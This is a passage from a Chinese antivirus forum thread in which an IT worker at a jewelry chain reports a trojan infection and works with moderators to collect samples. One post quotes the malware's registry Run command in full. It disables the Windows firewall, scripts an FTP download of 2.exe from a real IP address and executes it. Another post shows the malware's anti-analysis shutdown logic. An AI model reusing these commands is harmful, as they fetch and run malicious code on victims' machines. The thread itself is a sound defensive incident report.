123   1  /  3  页   跳转

net use bye xuzijianyes /add(net病毒)

收藏
本主题由 大版主 networkedition 于 2012-2-23 15:56:35 执行 移动主题 操作
吴文和
头像
初生襁褓狮
  • 帖子:18
  • 注册: 2011-05-27
  • 来自:
发表于: 2011-05-27 22:46 | 只看楼主 短消息 资料
字号: 1楼

net use bye xuzijianyes /add(net病毒)

因为我们是做珠宝销售的,开连锁店是正常的,分店通过ADSL后,走VPN和我们总部联系,结果,就中了 net use bye xuzijianyes /add。好像叫net病毒,把我的ftp.exe搞得说系统找不到该文件,明明该文件就存在。而且,就是安装了sql 2000,并提升用户为管理员后,中招的。用了版主介绍的sreng扫描一下,随后贴上我的扫描日志,都是分店电脑。

已解决:想不到我提供的木马被大版主采样了。好高兴!问题已经解决了,谢谢各位的帮助!

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.3; QQDownload 677; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; CIBA; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322; MS-RTC LM 8; AskTB5.6)
最后编辑吴文和 最后编辑于 2011-06-02 00:42:35
分享到:
gototop
 
byxxdrls
头像
卡卡反病毒小组
  • 帖子:1029
  • 注册: 2008-06-19
  • 来自:
发表于: 2011-05-28 18:43 | 短消息 资料
字号: 2楼

回复:net use bye xuzijianyes /add(net病毒)

建议你下载金山的黑客补丁http://bbs.duba.net/attachment.p ... ohBY9%2Bw3DhU6DUNRE
gototop
 
吴文和
头像
初生襁褓狮
  • 帖子:18
  • 注册: 2011-05-27
  • 来自:
发表于: 2011-05-28 20:46 | 只看楼主 短消息 资料
字号: 3楼

回复: net use bye xuzijianyes /add(net病毒)

谢谢老大 !今天值班过去用sreng2扫描后得出一个重要结果:ftp.exe原来是被映像劫持了,难怪,我从其他地方拷贝一个无问题的ftp.exe,系统却提示该文件无效,不是可以程序。后来激动,把注册表中被劫持的ftp.exe删除了,重新拷贝ftp.exe过来,一切恢复正常。忘记备份注册表。呵呵。太激动了。
只是ftp.exe恢复正常而已,那个shell项直到下班也没去理会。明天继续吧。附上扫描结果。



附件: sreng2.log (2011-5-28 20:45:30, 75.87 K)
该附件被下载次数 588
gototop
 
yujinyjyj
头像
初生襁褓狮
  • 帖子:1
  • 注册: 2009-06-17
  • 来自:
发表于: 2011-05-28 22:13 | 短消息 资料
字号: 4楼

回复:net use bye xuzijianyes /add(net病毒)

使用金山急救箱试试
gototop
 
吴文和
头像
初生襁褓狮
  • 帖子:18
  • 注册: 2011-05-27
  • 来自:
发表于: 2011-05-29 20:02 | 只看楼主 短消息 资料
字号: 5楼

回复: net use bye xuzijianyes /add(net病毒)

今天过来公司值班,远程到有问题的那部电脑,发现:net use bye xuzijianyes /add已经没有了,shell项的内容变成了:c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 60.173.10.220> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 2.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&2.exe&2.exe&del cmd.txt /q /f&exi。很明显,木马就是看中了这电脑刷卡机,估计从60.173.10.220安徽铜陵电信服务器中下载2.exe放在c:\windows\system32,并且附带了sb.txt文件,该sb.txt文件图标被伪装成系统无法辨认模样,用记事本打开后,发现会下载68.exe文件,但是我搜索整个硬盘没发现,包括隐藏文件夹也没有,我马上把这2.exe sb.txt删除,然后,在C:\Documents and Settings中,将所有用户文件夹里面的cmd.txt删除。可惜的是,注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的“shell” c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 60.173.10.220> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 2.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&2.exe&2.exe&del cmd.txt /q /f&exi,我却无法删除,提示我没有修改或者删除的权限。哎,管理员权限都无法删除,这个木马制作者,实在太狠了。咱们论坛里面有没有这样的高手?(貌似这个作者写出来的这个东西最近很流行的)
还有,它还会自己产生几个未知的用户:bodong,asd,全部是管理员权限的。看来,我只能重新安装系统了。

附上第二次扫描结果:

附件: SREngLOG.log (2011-5-29 20:10:15, 78.81 K)
该附件被下载次数 352

最后编辑吴文和 最后编辑于 2011-05-29 20:10:15
gototop
 
吴文和
头像
初生襁褓狮
  • 帖子:18
  • 注册: 2011-05-27
  • 来自:
发表于: 2011-05-29 20:35 | 只看楼主 短消息 资料
字号: 6楼

回复: net use bye xuzijianyes /add(net病毒)

我先传两个三个文件吧。好像都是木马来的

第一个:发现的地方位于c:\windows\system32,有一个文件夹名字是1025,里面放了这两个文件

附件: 新建文件夹.zip (2011-5-29 20:35:25, 554 B)
该附件被下载次数 386



第二个文件:发现的地方是在C:\Documents and Settings下每个用户的文件夹都存在。cmd.txt

附件: cmd.txt (2011-5-29 20:35:25, 57 B)
该附件被下载次数 369
gototop
 
天才小菜鸟1
头像
初生襁褓狮
  • 帖子:38
  • 注册: 2006-05-07
  • 来自:
发表于: 2011-05-29 22:25 | 短消息 资料
字号: 7楼

回复:net use bye xuzijianyes /add(net病毒)

tasklist|findstr /i "PROFILER90.exe" && shutdown -s -t 0
tasklist|findstr /i "PROFILER90.exe" && shutdown -s /f
tasklist|findstr /i "SqlExpressProfiler.exe" && shutdown -s -t 0
tasklist|findstr /i "SqlExpressProfiler.exe" && shutdown -s /f
tasklist|findstr /i "profiler.exe" && shutdown -s -t 0
tasklist|findstr /i "profiler.exe" && shutdown -s /f
del c:\windows\system32\1025\si.bat
顺便帮你发出来 影子系统 下测试的 - -
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2011-05-30 09:55 | 短消息 资料
字号: 8楼

回复 6F 吴文和 的帖子

c:\documents and settings\all users\application data\storm\update\%youshizhuay%\lcoef.cc3
c:\documents and settings\all users\drm\%sessionname%\nqmwj.mp3
c:\documents and settings\local user\windows.dll
c:\program files\windows media player\commtb32.dll
以上四个文件找到压缩发来。
gototop
 
吴文和
头像
初生襁褓狮
  • 帖子:18
  • 注册: 2011-05-27
  • 来自:
发表于: 2011-05-30 20:52 | 只看楼主 短消息 资料
字号: 9楼

回复: net use bye xuzijianyes /add(net病毒)



引用:
原帖由 networkedition 于 2011-5-30 9:55:00 发表
c:\documents and settings\all users\application data\storm\update\%youshizhuay%\lcoef.cc3
c:\documents and settings\all users\drm\%sessionname%\nqmwj.mp3
c:\documents and settings\local user\windows


小的无能为力,只找到前面两个文件,windows.dll和commtb32.dll一直未能找到。

附件: 新建文件夹 (3).rar (2011-5-30 20:51:40, 250.99 K)
该附件被下载次数 635
gototop
 
吴文和
头像
初生襁褓狮
  • 帖子:18
  • 注册: 2011-05-27
  • 来自:
发表于: 2011-05-31 17:11 | 只看楼主 短消息 资料
字号: 10楼

回复: net use bye xuzijianyes /add(net病毒)

怀疑公司被入侵了。又一台电脑中招了,所有必须启动的服务已经被停止,无法启动,启动就报错。

最新拷贝的可疑程序压缩包:

附件: net_2.zip (2011-5-31 17:10:44, 264.66 K)
该附件被下载次数 407
gototop
 
<<上一主题|下一主题>>
123   1  /  3  页   跳转
页面顶部
Powered by Discuz!NT